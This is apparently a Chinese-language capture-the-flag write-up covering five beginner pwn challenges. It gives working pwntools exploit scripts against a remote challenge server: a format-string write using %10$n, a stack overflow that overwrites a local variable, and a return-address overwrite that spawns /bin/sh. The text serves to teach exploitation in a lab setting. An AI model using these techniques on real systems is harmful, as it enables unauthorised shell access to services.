0x01get_shell

下载附件后直接丢IDA F5

图片.png
用LINUX加载这个文件
图片.png
111.198.29.45 43241
system("/bin/sh") 的功能为：执行/bin/sh shell命令。这样我们就可以获得交互，通过shell命令访问目标主机
图片.png
nc命令详解
手把手教你栈溢出从入门到放弃 上
手把手教你栈溢出从入门到放弃 下

0x02CGfsb

先用checksec查看开了哪些保护

图片.png

32位程序，开了NX(堆栈不可执行)以及CANNARY(栈保护)

pwntools的使用
利用过程：通过格式化字符串漏洞，将 pwnme 的值修改成8。

格式化字符串
%[parameter][flags][field width][.precision][length]type

参考wp https://blog.csdn.net/zz_Caleb/article/details/88980866
%n的作用是不输出字符（printf调用之后没有字符输出），但是把成功输入的字符个数写入指定地址的。%i< fmt>指定占位符对应第n个参数，例如：%12$x，此处%x对应第12个参数。 通过 ida 查看汇编代码 找到call printf的地址（调用printf(&s)）。之后我们用gdb进行调试，在调用printf(&s)之前下一个断点,查看接收 message 的变量 s 是格式化字符串的第几个参数。输入 message 的时候输入 ‘aaaa’

from pwn import *
 
p = remote('111.198.29.45', 49625)
pwnme = 0x0804A068
 
payload1 = 'aaaa'
payload2 = p32(pwnme) + 'aaaa%10$n'
 
p.recvuntil('please tell me your name:\n')
p.sendline(payload1)
p.recvuntil('leave your message please:\n')
p.sendline(payload2)
print(p.recv())
print(p.recv())

图片.png

0x03when_did_you_born

get()必有溢出

图片.png

判断两次v5，发现程序是矛盾的，若第一次v5=1926，就跳过cat flag了
因此需要利用栈溢出来修改v5为1926

图片.png

发现v4 v5 相差了8个字节
exp:

from pwn import *

r = remote("111.198.29.45", 58805)

payload = 'a' * (0x20 - 0x18) + p64(1926)

r.recvuntil("What's Your Birth?\n")
r.sendline("2000")

r.recvuntil("What's Your Name?\n")
r.sendline(payload)

print r.recv()
print r.recv()

0x04hello_pwn

so easy

图片.png

0x05level0

可以在read时，将函数返回地址覆盖为callsystem(bin/sh)函数地址，则可实现漏洞利用

from pwn import *  #导入pwntools中pwn包的所有内容
 
p = remote('111.198.29.45',33907)  # 链接服务器远程交互，等同于nc ip 端口 命令
 
elf = ELF('./ea3758e885904101913f7be6fff1bb2d')  # 以ELF文件格式读取ea3758e885904101913f7be6fff1bb2d文件
 
sysaddr = elf.symbols['callsystem']  # 获取ELF文件中callsystem标记的地址
 
payload = 'a'*(0x80 + 8) + p64(sysaddr)  # payload，先用0x88个无用字符覆盖buf和push中的内容，之后再覆盖返回地址
 
p.recv()  #接收输出
 
p.send(payload)  # 发送payload
 
p.interactive()  # 反弹shell进行交互

图片.png